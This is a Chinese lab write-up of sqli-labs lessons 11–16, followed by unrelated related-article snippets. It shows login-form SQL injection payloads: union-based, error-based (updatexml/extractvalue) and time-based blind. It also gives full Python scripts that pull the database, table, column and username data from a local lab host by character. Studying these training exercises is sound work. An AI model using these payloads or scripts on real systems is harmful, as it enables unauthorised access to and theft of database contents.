sqli-labs(3)

news2024/11/15 21:30:56

11.

看到登录框直接or 1=1

在hackerabar中我们可以看到这里是post传递的数据,在get中用--+来注释后面的内容 因为get中#是用来指导浏览器动作的,--代表注释+是空格,所以这里用#

之后就和get的一样了

1' order by 2 #

order by 3报错

联合注入

1' union select 1,2 #

1‘ union select database(),2#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1' union select 1,group_concat(username) from security.users #

12.

1'没反应尝试”

通过“尝试得到报错知道还要)

1") or 1=1 #

之后一样’

1") union select 1,2 #

1") union select 1,database() #

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1") union select 1,group_concat(username) from security.users #

13.

1‘尝试出现报错,知道是1’)

显示登录成功但不会出现提示但是有报错信息使用报错注入,这里使用报错注入我们使用两种报错注入方法

1') and extractvalue(1,concat(0x5c,database()))#

1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

注入得到表名

 1')  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
 1') and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) #


注入的列名

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
1') and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

注入的数据

1') and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)
1') and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

14.

对输入框测试发现当输入1“ or 1=1 #登录成功

使用报错注入

1" and updatexml(1,concat(0x7e,database(),0x7e),1)#
1" and extractvalue(1,concat(0x5c,database()))#

得到数据库库名

1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

得到表名

1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

得到列名

1" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

15.

当1’ or 1=1#返回登录成功

这里看到如果输入的为错则返回登录失败不会出现报错信息使用布尔盲注

这里我们要知道and 和or的区别 and'两边的条件都为真才会执行 or一边为真就会执行,而这里我们如果没有爆破过用户admin也不在username中那我们就只能使用or,这里的登录框根据经验第一个肯定是获取username的

admin' and (substr(database(),1,1)='s')#
1' or (substr(database(),1,1)='s')#

1' or (substr(database(),1,1)='a')#

这里成功和失败只会返回不同的照片对于脚本来说没有很明显的特征我们使用sleep来写脚本

import requests,time
def database():
        data_base = ''
        charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        while True:
                for char in charset:
                        payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}
                        url = "http://192.168.1.200:86/Less-15/"

                        start_time = time.time()
                        rsp = requests.post(url,data=payload)
                        end_stime = time.time()
                        rsp_time = end_stime - start_time
                        #print(f"耗时:{rsp_time}")
                        if rsp_time > 2:
                                data_base += char
                                print(f"数据库名为:{data_base}")
                                break
                else:
                        break
        return data_base
                        


                        
datas = database()
print(f"最终数据库名为:{datas}")
1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

   

def tablename():
    table_name = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
                payload = {
                           "uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#",
                           "passwd":"123456"
                           }
                url = "http://192.168.1.200:86/Less-15/"
                    
                start_time = time.time()
                rsp = requests.post(url,data=payload)
                end_stime = time.time()
                rsp_time = end_stime - start_time
                if rsp_time > 2:
                        table_name += char
                        print(f"表名为:{table_name}")
                        break
        else:
              break
              
    return table_name

tables = tablename()
print(f"最终表名为:{tables}")

1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

def  columnname():
        column_name = ''
        charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        while True:
                for char in charset:
                        payload = {
                                "uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#",
                                "passwd":"123456"
                        }
                        url = "http://192.168.1.200:86/Less-15/"
                        start_time = time.time()
                        rsp = requests.post(url,data=payload)
                        end_time = time.time()
                        rsp_time = end_time - start_time

                        if rsp_time > 2:
                                column_name += char
                                print(f"列名为:{column_name}")
                                break
                else:
                        break
        return column_name

columns = columnname()
print(f"最终列名为:{columns}")
1' or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

def data():
    data = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = {
                "uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#",
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-15/"

            start_time = time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data

datadata = data()
print(f"最终数据为:{datadata}")
import requests,time
def database():
        data_base = ''
        charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        while True:
                for char in charset:
                        payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}
                        url = "http://192.168.1.200:86/Less-15/"

                        start_time = time.time()
                        rsp = requests.post(url,data=payload)
                        end_stime = time.time()
                        rsp_time = end_stime - start_time
                        #print(f"耗时:{rsp_time}")
                        if rsp_time > 2:
                                data_base += char
                                print(f"数据库名为:{data_base}")
                                break
                else:
                        break
        return data_base
                        


                        
datas = database()
print(f"最终数据库名为:{datas}")

def tablename():
    table_name = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
                payload = {
                           "uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#",
                           "passwd":"123456"
                           }
                url = "http://192.168.1.200:86/Less-15/"
                    
                start_time = time.time()
                rsp = requests.post(url,data=payload)
                end_stime = time.time()
                rsp_time = end_stime - start_time
                if rsp_time > 2:
                        table_name += char
                        print(f"表名为:{table_name}")
                        break
        else:
              break
              
    return table_name

tables = tablename()
print(f"最终表名为:{tables}")
        
                
def  columnname():
        column_name = ''
        charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        while True:
                for char in charset:
                        payload = {
                                "uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#",
                                "passwd":"123456"
                        }
                        url = "http://192.168.1.200:86/Less-15/"
                        start_time = time.time()
                        rsp = requests.post(url,data=payload)
                        end_time = time.time()
                        rsp_time = end_time - start_time

                        if rsp_time > 2:
                                column_name += char
                                print(f"列名为:{column_name}")
                                break
                else:
                        break
        return column_name
columns = columnname()
print(f"最终列名为:{columns}")
                                   
def data():
    data = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = {
                "uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#",
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-15/"

            start_time = time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data

datadata = data()
print(f"最终数据为:{datadata}")

16.

测试发现1" or 1=1 #时登录成功

1") or if(substr(database(),1,1)='s',sleep(5),0 )#

import requests,time

def dataname():
    data_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-16/"

            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                data_name += char
                print(f"数据库为:{data_name}")
                break
        else:
            break
    return data_name

datas = dataname()
print(f"最终数据名为:{datas}")
                

1") or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

def tablename():
    table_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                table_name += char
                print(f"表名为:{table_name}")
                break
        else:
            break
    return table_name

tables = tablename()
print(f"最终表名为:{tables}")

1") or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

def columnname():
    column_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                column_name += char
                print(f"字段名为:{column_name}")
                break
        else:
            break
    return column_name    

columns =   columnname()
print(f"最终字段名为:{columns}")

1") or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

def data():
    data = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url =   "http://192.168.1.200:86/Less-16/"
            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data

datas = data()    
print(f"最终数据为:{datas}")

最终脚本

import requests,time

def dataname():
    data_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-16/"

            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                data_name += char
                print(f"数据库为:{data_name}")
                break
        else:
            break
    return data_name

datas = dataname()
print(f"最终数据名为:{datas}")
                
def tablename():
    table_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                table_name += char
                print(f"表名为:{table_name}")
                break
        else:
            break
    return table_name

tables = tablename()
print(f"最终表名为:{tables}")


def columnname():
    column_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                column_name += char
                print(f"字段名为:{column_name}")
                break
        else:
            break
    return column_name    

columns =   columnname()
print(f"最终字段名为:{columns}")


def data():
    data = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',
                "passwd":"123456"
            }
            url =   "http://192.168.1.200:86/Less-16/"
            start_time =time.time()
            rsp = requests.post(url,data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time >2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data

datas = data()    
print(f"最终数据为:{datas}")

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1237218.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【5k字长文 | Vue学习笔记】#1 认识Vue对象和基础语法

Vue是一个非常流行的渐进式JavaScript框架,渐进式指的是自底向上,从小组件逐渐向上构成整个项目,渐进式还可以理解为:用什么就拿什么,每个组件只做自己的事,尽可能解耦合。 本节我们将学习简单的Vue实例&a…

渗透测试高级技巧(一):分析验签与前端加密

“开局一个登录框” 在黑盒的安全测试的工作开始的时候,打开网站一般来说可能仅仅是一个登录框;很多时候这种系统往往都是自研或者一些业务公司专门研发。最基础的情况下,我们会尝试使用 SQL 注入绕过或者爆破之类的常规手段,如果…

【文末送书】十大排序算法C++代码实现

欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关…

数独·12中解法·anroid 数独小游戏·休闲益智小游戏

标题数独12中解法anroid 数独小游戏休闲益智小游戏(继续更新中……) 一款经典数独训练app 资源下载 (0积分)https://download.csdn.net/download/qq_38355313/88544810 —— —— 数独(sh d)是源自18世纪…

Find My音箱|苹果Find My技术与音箱结合,智能防丢,全球定位

音箱市场规模正在不断扩大。随着人们生活品质的提高,对音乐体验的需求也在不断升级。消费者对于蓝牙音箱的需求,已经从单纯的音质扩展到了功能、设计和价格等多个方面。随着移动化、即时化的视听娱乐需求的增长,蓝牙音箱性能、质量、外观设计…

定时器的使用

目录 前言 正文 1.方法 schedule(TimerTask task, Date time) 的测试 (1)执行任务的时间晚于当前时间(在未来执行)的效果 (2)线程TimerThread不销毁的原因 (3)使用 public void cancel() 方法实现 T…

Java 下载地址

1 地址: Java Downloads | Oracle 2 往下翻(Java 8 和 Java 11) 3 往下翻 (JRE 下载)(JRE 8 为例) 4 跳转到登录(登录账号才可以下载)

Flink Operator 使用指南 之 Flink Operator安装

介绍 Flink Kubernetes Operator 充当控制平面来管理 Apache Flink 应用程序的完整部署生命周期。尽管 Flink 的Native Kubernetes 集成已经允许用户在运行的 Kubernetes(k8s) 集群上直接部署 Flink 应用程序,但自定义资源和Operator Pattern 也已成为 Kubernetes 原生部署体…

跑步耳机哪个牌子好?这五款跑步耳机闭眼入也不会错!

作为一个经常跑步运动的人,总感觉运动能够让人暂时远离城市的喧嚣,同时运动也是一种特别好的舒压方法。但跑步的时候如果没有音乐助燃,那是没有灵魂的,这也许就是现代年轻人的矫情吧,我在运动的时候经常会佩戴骨传导耳…

渗透测试高级技巧(二):对抗前端动态密钥与非对称加密防护

在前文的技术分享中,我们描述了验签和静态对称加密(静态密钥 AES)的常见场景,大家我相信遇到类似的加解密清醒,基本都可以通过热加载的基本使用获得破解前端加密解密的方法,达到一个比较好的测试状态。 在…

无法创建 8192 MB 的匿名分页文件: 系统资源不足,无法完成请求的服务。

好久没用VMware Workstation,今天突然要用,发现所有的虚机在启动的时候提示都提示: 无法创建 XXXX MB 的匿名分页文件:页面文件太小,无法完成操作。 未能分配主内存。 模块"MainMem"启动失败。 未能启动…

[计算机网络实验]头歌 实验二 以太网帧、IP报文分析

目录 第1关:Wireshark基本使用入门 【实验目的】 【实验环境】 【本地主机、平台虚拟机之间数据传递】 wireshark基本用法】 1、wireshark主界面 2、抓取分组操作 3、Wireshark窗口功能 4、筛选分组操作 【实验操作】 ​编辑 第2关:Ethernet帧…

排序算法--冒泡排序

实现逻辑 ① 比较相邻的元素。如果第一个比第二个大,就交换他们两个。 ②对每一对相邻元素作同样的工作,从开始第一对到结尾的最后一对。在这一点,最后的元素应该会是最大的数。 ③针对所有的元素重复以上的步骤,除了最后一个。 ④…

怎么判断list是否为null

List<Entity> baseMess new ArrayList<>(); baseMess motiveService.getBaseMessage(machine.get(i),preDate,nowDate); System.out.println("获取Size"baseMess.size()); baseMess.removeIf(Objects::isNull); System.out.println("获取Size"…

NV080D语音芯片:让智能快递柜取件更便利

随着互联网的普及和电子商务的迅速发展&#xff0c;网购消费已经成为了越来越多人的选择。这也催生了一个庞大的“网购一族”&#xff0c;他们购买的各种商品会通过快递公司送到家门口。然而&#xff0c;收取快递往往也伴随着一系列问题。比如&#xff0c;派送时间和收件人取件…

使用Echarts.js绘制中国地图

使用Echarts.js绘制中国地图 一、页面效果 二、功能描述 ​ 1、展示中国所有省份&#xff0c;包括南海诸岛&#xff0c;确保领土完整&#xff0c;中国领土神圣且不可侵犯。 ​ 2、每个省份根据对应数据的不同渲染不同的颜色&#xff0c;根据数据从小到大&#xff0c;对应底部…

maven pom引入依赖不报红,但是项目Dependencies中没有引入jar包

前言 小编我将用CSDN记录软件开发求学之路上亲身所得与所学的心得与知识&#xff0c;有兴趣的小伙伴可以关注一下&#xff01; 也许一个人独行&#xff0c;可以走的很快&#xff0c;但是一群人结伴而行&#xff0c;才能走的更远&#xff01;让我们在成长的道路上互相学习&…

ROS2对比ROS1的一些变化与优势(全新安装ROS2以及编译错误处理)《1》

1、概述 我们在前面介绍的ROS&#xff0c;都是ROS1的版本&#xff0c;近期对机器狗进行学习的时候&#xff0c;发现版本是ROS2了&#xff0c;也发现平时习惯的一些命令都有了变化&#xff0c;改变还是挺大的&#xff0c;不过熟悉之后还是很习惯ROS2的写法。 ROS2不是在ROS1的基…

基于SSM的公司仓库管理系统(有报告)。Javaee项目

演示视频&#xff1a; 基于SSM的公司仓库管理系统&#xff08;有报告&#xff09;。Javaee项目 项目介绍&#xff1a; 采用M&#xff08;model&#xff09;V&#xff08;view&#xff09;C&#xff08;controller&#xff09;三层体系结构&#xff0c;通过Spring SpringMvc …